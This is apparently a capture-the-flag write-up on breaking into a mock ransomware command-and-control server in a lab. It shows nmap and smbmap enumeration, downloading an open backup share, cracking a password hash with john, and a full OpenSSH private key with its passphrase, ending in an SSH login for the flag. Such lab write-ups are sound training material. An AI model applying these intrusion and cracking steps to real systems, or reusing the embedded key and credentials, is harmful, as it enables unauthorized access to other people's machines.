DESCRIPTION
Network security monitoring system gives alerts with one IP address that the ransomware connected to.
Can this be hackers computer or command & control server?
If you can access it, you might find something interesting
QUESTION
Gain user level access to the attackers command & control server atΒ 10.12.32.130
SOLUTION
Nmap scan report for 10.12.32.130
Host is up (0.00013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:50:56:B8:E3:58 (VMware)
Service Info: Host: COMMAND_CONTROL_SRV1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Shell
22 - SSH
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:B8:E3:58 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Shell
root@cboekali-100:~/cncaccess# smbmap -H 10.12.32.130 -R
[+] Guest session IP: 10.12.32.130:445 Name: 10.12.32.130
Disk Permissions Comment
---- ----------- -------
Backup READ ONLY Server backups
.\Backup\*
dr--r--r-- 0 Tue Nov 10 19:36:01 2020 .
dr--r--r-- 0 Mon Nov 16 16:57:11 2020 ..
fr--r--r-- 652 Sun Oct 25 15:29:19 2020 README
dr--r--r-- 0 Sat Oct 24 21:34:33 2020 docs-backup
fr--r--r-- 3898 Tue Nov 10 19:36:01 2020 credz_backup.zip
.\Backup\docs-backup\*
dr--r--r-- 0 Sat Oct 24 21:34:33 2020 .
dr--r--r-- 0 Tue Nov 10 19:36:01 2020 ..
fr--r--r-- 355153 Tue Aug 8 21:15:53 2000 interunx.txt
fr--r--r-- 4736 Tue Aug 8 21:51:03 2000 arpanet.txt
fr--r--r-- 10379 Thu Sep 20 05:33:25 2001 hackpage.txt
fr--r--r-- 6292 Sun Aug 13 06:10:33 2000 hss.txt
fr--r--r-- 10708 Sun Aug 13 06:07:00 2000 hack.txt
fr--r--r-- 51966 Sat Jun 22 07:54:28 2002 admin2.txt
Exploits NO ACCESS Exploit collection. Priv access
Data-dumps NO ACCESS Dumped data. Priv access
IPC$ NO ACCESS IPC Service (command_control_SRV1 server C&C Samba)
Shell
Download all files on public shares:
smbget -R smb://10.12.32.130 -a
Shell
Password for credz_backup.zip: computer
User of CNC server: max
Pass of CNC server: $6$kzxfdnc2$uTn3VO..Xy9E9/ZVflghOsfd.KIzfyPhFOeVgs9pymY.RbTo85HQjn5oHfF3Y6rbZFMtNVsW3I8n/5hlGFYQv/
# unshadowed.txt
# john --wordlist=/usr/share/wordlists/john/all.lst unshadowed.txt --users=max --session=sess
max:$6$kzxfdnc2$uTn3VO..Xy9E9/ZVflghOsfd.KIzfyPhFOeVgs9pymY.RbTo85HQjn5oHfF3Y6rbZFMtNVsW3I8n/5hlGFYQv/:1000:1000::/home/max:/bin/bash
Shell
# SSH KEY PASS: qwerty
# john --wordlist=/usr/share/wordlists/rockyou.txt qwerty
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jYmMAAAAGYmNyeXB0AAAAGAAAABBTVAS2Co
ZGhMQlUGJ7dRcQAAAAEAAAAAEAAAIXAAAAB3NzaC1yc2EAAAADAQABAAACAQCy1AwNDnCY
uAHhB4fO8GDs+x14kSC8xbGM7+f8K0WN1wyEQDW9QfwcXuFYjmk/hxg4RvQwu8IS1I04ny
QnklfhOTXtYDYeWVJ0CM7vbCC8CSVohMMsiil+ZH+ddEedPckfqj4fntTLXGY5Oxq2DFU6
IPqBH1Psc0gSxdwOh5rvuWxMr/gvTvJh+YDZiHqtilW/xS53vXc6c1WFgNEqof1qvoAk0n
SCneBpaLcRsw1dRGWvbo40nUZHBoLvo/SYBFUAx1r0qt46kcZ1EJ7nRiq85t3FXO1nJ1j+
dQq4tEISrDzTsbWiKNA+nYOxGhb7HX4n7w35pDjABtjIcOZd75ilFckMYS98ZATvTiarBH
Ln+okfE+i9EznAxqJAjkY5aiUP15hnYZcsJrEGZoTzVKs+LLN7H+ciUucHsAf9Th6bHKTw
AAVCtrAu0t/WftqGvNK67e8Sbc+YXy14y8Gi86j3sPoYxiNoWTZWeFLY0ahETsWXxBbhNn
f5RfS8zEEk2xqHJOgD8kkF5cjOlRXjCiiABeAYW4ro8/nbvbsp2p09xS9C4SWoGRPalfm/
nfWeNns7zHO+BG9EyFQhJddz0c/lvQxgT6wbuIO0GhfTPbWGo8r2MCuqkyS2Fkal7QJfll
/MDgxvHGYFXD3yDPycaIiH/Ulma5VMaZtJgNJlTwCHNQAAB1DIO++K0PZssGPZyTUWlDO+
Qxe6Cgism+sA25Gg6wo1xzuboIoL2ZFzGgy7Dabi5cCDpabNeGp84sR2eDOwCbqXYY0pXK
4D9gQfrnsvAhUx9WihyBELAjkczFGe87FHDwP4seWvdZ/CjJOPG0VbYbYoOvDBxZOHZHRc
W0jt0FVyOKlOQjwGuNOCsBOrGcIzdJwyYYtaH+HF1KT1P5YbHwpngTKL/YoAj1hQ4zztXB
DxsmGUG3/nCmQRKiU7diqgfJdrEOTc+0ZIb4YscfDAuqONMZOQNCn4d7FAHLWCyYE1DiGw
XhbNEA3Dg/wcFzJZRZslWNGKtQEJtfajjDGlPr1KIqB9neAnestPbUHl07+wAPLdQ4KGP7
nCV91WPN3P2ypCWeQ73AXtlnwciRtxDxdLMABHTp3tkluOR7OhqwcsyurBrErA0RgS1l4f
c6eauDBgq4qY76k0ZsAe4vF+tAmL0PaIftE4lsW4vs1VgJxPHrTwqvfuv0pU5AaHVMxhKs
w6xCqmGbk9+8ILnCHNemxxY7QOp/To/ei7ar8lKrAtjt3ds6EjyBPlPV8n/Ji+EVL3gWUD
M4tkh6ekRCtxuSfgM2SH/phbucnw4zXB4waR8WHryppZ1wrKjsKSK9iLPBqWVhjq/rDgou
4BIsEKohEX8DcFQFjAMvK1YvcyJeYEE6JRUHb+PR3OoZbzrbL1TrI+w81oL222oXIVPKsa
8TSCZ6Dy5ypJAriakOK4DaHJbCG0RnmszMe8FbIZSt+jQKb3UHJidlaotZIB2bouXmeNQf
j3cHpqx7JAUNIxNqs8LDcTV7QINC3pOu+++yhWCcZGrYSNZIQWr8sk/FSM52g5BFVSryeK
4rTztjWOP9RgW3f2NZAS9uqeWoDBecEQ4LK6o3g6G5hOOKSKj42ZWGyeJvR27UZPsKKGzq
myfsWekMu8C0SkOXiPIWu+IdCDZy7o5K1AJyNAv0N9Www21v91xwOM/Qe2+IYHw6Xj75WF
cC8Tc3UzuuCh99ysdiSh9w2oOHfmMZQ3kZePxfVkFxi4nMpgqF8nK5KMtF4+dD/Cm5N9Nj
Oln4pq0jPY87RCp5Q79Nh/Hsv5BX+bIZR/7pawU9pNcAvosXrTd94TN6BIxmG2Vx5hcw8M
Qji7uJSpRfKrd/AAGvKo1LlAYrqACkyUiUgntpDf7/jpWuLvKG8nzU+/Yayu5pFeeFo7l1
etOL5YTN2NvPmFXd3ckaSmDmnDrH5Ok+ek2tMnqtyfyU5MDj9tWTQ/Cic2tt4UNOzVw3TL
CkvtWIwJhzl8kMle+GB+w9px9ZxOHrP0Gt4MXkH9wzq9FapC8S3kdOUDs0knCY/RnMFJv0
0kigunhJA7aRxfY3Fw769rhuNymqRl+GPtGSnNft5eFuHJyVT/Ff0Xlyy680M7JXwbQYXy
hwJoZP5vDmHpjHY7bSTYG3YkglfWWpZPA26frI4Sn6igLWksTtPxyWDVPEtnKO/JEqAEdi
PWIgCi6NEPccG56mLg1D3N1bL+/81DvDaXhg517X07locUgfY+ZM3CsvFuvcw5x4S1Q+8e
py4CjUx8oUDKVo66V1sePZw4lTtztBHMURceEVtoEnAaHshXlfeYYUyf4I9CQwnzYeP4/k
BAVo+wF1IIE4dbkGjt5RzQTFiKtNSzTgFauBM0m3izUxuCWJeqcCwpwGlMcxSVQs9M/EjF
V7bSOBNwiM6QVlke7fAjDSodW8XHQj258JfQdkDmuRujRAbpvMLRWJmBt1VtwZhp3JH8c3
3xOcC9yD4Eg7Adbobc5MGzEAAgPRmySqqAG1tSicewE794T1+R8eFQqNR1slnylArGf5IN
mENivTFTYVONfRU28NhjRB9bocl4M6aiRRuRsptGbXWU2grshH5BalhQTYtdVditVpCLwo
c30QOzV6NUuAnA7qzEcvvXKTBkWhWBAAx/LZ86g38pvDyRJuqwR2FHXDmKXKrhK/UHBbjZ
dcPaxUXHkSLt8nxbut7HBxuWqAcixLJfFQord/znnzpV03WOW0cfePMW1u8oYS+Oc/6pQE
64CY813iozc458GGpK/OqKsQd62UqWu/RB7QiEafjRV+yw/JjwmENYpaMLSF3Yh8/jcymT
Cu7wJJKWwkpDtQT58tBQiEVQSfH+KmMr+8Td9+Yv+T3sbVGjilxtDg/66r1hPRBnWTTPNn
KmxQlC4M0t0QPYHXJJFzozUMrFAs79CGjQD6J2i9ACEm5q9oM4wE4iBGyhtzCPJBMV+5/S
yJwtkJiGw2n6ibuFgdOVuU7r52PVqwh4kfxO07r0tUSquZF3OLPW9IlZ/KfPA5JR/CKC41
nUbaA4CEQlIForVzs/oZTKsCTRT9PZSZUPbHf0sx5UGsHxugN+rB/4NU33xm000NVmv/Jf
+9LuWaF8sxxMfm6LGSaqCWqu+do4gtEHbPGDJBKGyFH5BWRlRLOdUv4X5m6AxTewkvqvWg
k4NnZkdlGMgf5/urFhqY5rhn0=
-----END OPENSSH PRIVATE KEY-----
Shell
Log in with SSH and get the flag.